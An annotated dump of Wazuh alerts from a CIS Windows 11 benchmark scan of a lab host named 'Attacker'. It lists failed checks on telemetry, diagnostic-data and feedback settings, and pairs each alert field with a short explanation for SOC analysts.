rule.cis:  ['18.9.17.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2527712
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26294
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Diagnostic Data' is set to 'Enabled: Diagnostic data off (not recommended)' or 'Enabled: Send required diagnostic data'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the amount of diagnostic and usage data reported to Microsoft: - A value of (0) Diagnostic data off (not recommended). Using this value, no diagnostic data is sent from the device. This value is only supported on Enterprise, Education, and Server editions. If you choose this setting, devices in your organization will still be secure. - A value of (1) Send required diagnostic data. This is the minimum diagnostic data necessary to keep Windows secure, up to date, and performing as expected. Using this value disables the Optional diagnostic data control in the Settings app. - A value of (3)Send optional diagnostic data. Additional diagnostic data is collected that helps us to detect, diagnose and fix issues, as well as make product improvements. Required diagnostic data will always be included when you choose to send optional diagnostic data. Optional diagnostic data can also include diagnostic log files and crash dumps. Use the Limit Dump Collection and the Limit Diagnostic Log Collection policies for more granular control of what optional diagnostic data is sent. Windows telemetry settings apply to the Windows operating system and some first party apps. This setting does not apply to third party apps running on Windows 10/11. The recommended state for this setting is: Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data. Note: If your organization relies on Windows Update, the minimum recommended setting is Required diagnostic data. Because no Windows Update information is collected when diagnostic data is off, important information about update failures is not sent. Microsoft uses this information to fix the causes of those failures and improve the quality of updates. Note #2: The Configure diagnostic data opt-in settings user interface group policy can be used to prevent end users from changing their data collection settings. Note #3: Enhanced diagnostic data setting is not available on Windows 11 and Windows Server 2022 and has been replaced with policies that can control the amount of optional diagnostic data that is sent. For more information on these settings visit Manage diagnostic data using Group Policy and MDM
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Allow Diagnostic Data. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 11 Release 21H2 Administrative Templates (or newer). Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Allow Telemetry, but it was renamed to Allow Diagnostic Data starting with the Windows 11 Release 21H2 Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.722+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.722+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.2']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2535875
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26295
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service' is set to 'Enabled: Disable Authenticated Proxy usage'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether the Connected User Experience and Telemetry service can automatically use an authenticated proxy to send data back to Microsoft. The recommended state for this setting is: Enabled: Disable Authenticated Proxy usage.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending any data to a 3rd party vendor is a security concern and should only be done on an as needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Disable Authenticated Proxy usage: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Configure Authenticated Proxy usage for the Connected User Experience and Telemetry service. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.738+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.738+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2539776
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26296
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Disable OneSettings Downloads' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Windows attempts to connect with the OneSettings service to download configuration settings. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending data to a 3rd party vendor is a security concern and should only be done on an as-needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Disable OneSettings Downloads. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.753+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.753+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not show feedback notifications' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.4']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2542714
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26297
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not show feedback notifications' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows an organization to prevent its devices from showing feedback questions from Microsoft. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Users should not be sending any feedback to 3rd party vendors in an enterprise managed environment.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Do not show feedback notifications. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template FeedbackNotifications.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.769+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.769+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.5']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2545987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26298
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enable OneSettings Auditing' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Windows records attempts to connect with the OneSettings service to the Operational EventLog. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Enable OneSettings Auditing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.784+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.784+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.6']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2549073
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26299
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Limit Diagnostic Log Collection' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether additional diagnostic logs are collected when more information is needed to troubleshoot a problem on the device. The recommended state for this setting is: Enabled. Note: Diagnostic logs are only sent when the device has been configured to send optional diagnostic data. Diagnostic data is limited with recommendation Allow Diagnostic Data is set to Enabled: Diagnostic data off (not recommended) or Enabled: Send required diagnostic data to send only basic information.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Sending data to a 3rd-party vendor is a security concern and should only be done on an as-needed basis.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Data Collection and Preview Builds\Limit Diagnostic Log Collection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template DataCollection.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.17.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\DataCollection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.816+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.17.8']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['2.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2552677
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26301
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Toggle user control over Insider builds' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

